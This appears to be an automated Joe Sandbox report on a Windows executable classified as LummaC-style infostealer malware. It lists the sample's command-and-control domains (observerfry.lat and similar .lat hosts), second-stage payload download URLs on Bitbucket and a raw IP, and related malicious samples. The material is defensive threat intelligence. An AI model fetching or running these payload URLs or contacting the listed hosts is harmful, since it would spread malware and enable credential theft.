OtHVIQ2ge4.exe	100%	Avira	TR/Crypt.TPM.Gen
OtHVIQ2ge4.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://observerfry.lat/api-Age	0%	Avira URL Cloud	safe
https://observerfry.lat/s	0%	Avira URL Cloud	safe
https://observerfry.lat/ry	0%	Avira URL Cloud	safe
https://observerfry.lat/apip	0%	Avira URL Cloud	safe
https://observerfry.lat/Uu	0%	Avira URL Cloud	safe
https://observerfry.lat/apik	0%	Avira URL Cloud	safe
https://observerfry.lat:443/apin.txtPK	0%	Avira URL Cloud	safe
https://observerfry.lat/RC	0%	Avira URL Cloud	safe
https://observerfry.lat:443/api	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://dz8aopenkvv6s.cloudfront.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	52.217.75.84	true	false	high
bitbucket.org	185.166.143.49	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
observerfry.lat	104.21.36.201	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
slipperyloo.lat	false	high
curverpluch.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	false	high
observerfry.lat	false	high
wordyfindy.lat	false	high
https://observerfry.lat/api	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exef	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apip	OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001741000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515380529.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1533192683.000000000170B000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://observerfry.lat/s	OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1519646355.0000000001762000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat/apik	OtHVIQ2ge4.exe, 00000000.00000003.1515056514.0000000001755000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com:443	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0	OtHVIQ2ge4.exe, 00000000.00000002.1923369236.000000000135A000.00000004.00000010.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exer	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/api	OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat/api-Age	OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016CD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat:443/apin.txtPK	OtHVIQ2ge4.exe, 00000000.00000003.1515306602.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1572011566.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1490713276.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat/RC	OtHVIQ2ge4.exe, 00000000.00000003.1412529541.000000000170A000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412390385.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeagerQ	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016E7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe0	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.00000000016D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/Uu	OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://observerfry.lat/	OtHVIQ2ge4.exe, 00000000.00000003.1571967887.0000000001762000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1412482635.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669516961.0000000001754000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1437414630.0000000005E21000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	OtHVIQ2ge4.exe, 00000000.00000003.1668686461.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E17000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1928241920.0000000006499000.00000002.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1668516238.0000000005E73000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005DA6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/ry	OtHVIQ2ge4.exe, 00000000.00000003.1465585068.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488527580.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488413895.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1462101979.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1488229578.0000000005E30000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1460907654.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	OtHVIQ2ge4.exe, 00000000.00000003.1465943932.0000000005EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe8	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.cookielaw.org/	OtHVIQ2ge4.exe, 00000000.00000003.1669399598.000000000173E000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1667707090.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	OtHVIQ2ge4.exe, 00000000.00000003.1463375710.0000000005E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	OtHVIQ2ge4.exe, 00000000.00000002.1927498523.0000000005E08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	OtHVIQ2ge4.exe, 00000000.00000002.1923723190.0000000001747000.00000004.00000020.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1669399598.0000000001747000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OtHVIQ2ge4.exe, 00000000.00000003.1413980413.0000000005DDD000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414278908.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp, OtHVIQ2ge4.exe, 00000000.00000003.1414039052.0000000005DDA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.217.75.84	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false
104.21.36.201	observerfry.lat	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579973
Start date and time:	2024-12-23 17:20:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	OtHVIQ2ge4.exe renamed because original name is a hash value
Original Sample Name:	4ba0641b1f9224605df854c9baaa5dcf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.12.23.50, 20.190.147.4
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target OtHVIQ2ge4.exe, PID 7832 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: OtHVIQ2ge4.exe

Simulations

Behavior and APIs

Time	Type	Description
11:20:56	API Interceptor	24x Sleep call for process: OtHVIQ2ge4.exe modified
11:21:49	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.166.143.49	http://jasonj002.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	jasonj002.bitbucket.io/
104.21.36.201	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse
	ABnDy7rLFS.exe	Get hash	malicious	LummaC, Stealc	Browse
	skIYOAOzvU.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	mG83m82qhF.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	LP4a6BowQN.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	5RjjCWZAVv.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	TmmiCE5Ulm.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
s3-w.us-east-1.amazonaws.com	payment_3493.pdf	Get hash	malicious	Unknown	Browse	3.5.29.153
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	3.5.25.82
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	3.5.29.90
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	52.216.152.124
	mG83m82qhF.exe	Get hash	malicious	LummaC	Browse	52.217.136.89
	LP4a6BowQN.exe	Get hash	malicious	LummaC	Browse	16.182.101.249
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse	52.217.67.100
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse	52.217.18.140
	5RjjCWZAVv.exe	Get hash	malicious	LummaC	Browse	52.217.203.57
	TmmiCE5Ulm.exe	Get hash	malicious	LummaC	Browse	3.5.16.86
s-part-0035.t-0009.t-msedge.net	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	7q551ugrWe.exe	Get hash	malicious	UltraVNC	Browse	13.107.246.63
	https://laimilano.powerappsportals.com/	Get hash	malicious	Unknown	Browse	13.107.246.63
	G3izWAY3Fa.exe	Get hash	malicious	GhostRat, Nitol	Browse	13.107.246.63
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	13.107.246.63
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	4je7za5c0V.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	nTyPEbq9wQ.lnk	Get hash	malicious	Unknown	Browse	13.107.246.63
	uuOuIXWp1W.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.63
	dnf5RWZv2v.exe	Get hash	malicious	Unknown	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	ChoForgot.exe	Get hash	malicious	Vidar	Browse	3.160.188.50
	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	52.89.58.139
	https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0	Get hash	malicious	Unknown	Browse	44.226.126.181
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70	Get hash	malicious	HtmlDropper	Browse	13.56.148.153
	https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9	Get hash	malicious	Unknown	Browse	76.223.125.47
	R2-Signed.exe	Get hash	malicious	ValleyRAT	Browse	18.139.89.40
	TsWpfWrp.exe	Get hash	malicious	ValleyRAT	Browse	52.74.204.186
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	3.5.232.230
	Archivo-PxFkiLTWYG-23122024095010.hta	Get hash	malicious	Unknown	Browse	3.5.232.130
CLOUDFLARENETUS	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	http://tax-com.com	Get hash	malicious	Unknown	Browse	172.67.203.198
	https://www.cocol88.site/l6v3z.php	Get hash	malicious	Unknown	Browse	104.21.63.207
	https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0	Get hash	malicious	Unknown	Browse	172.67.69.226
AMAZON-02US	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	3.160.188.50
	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	52.89.58.139
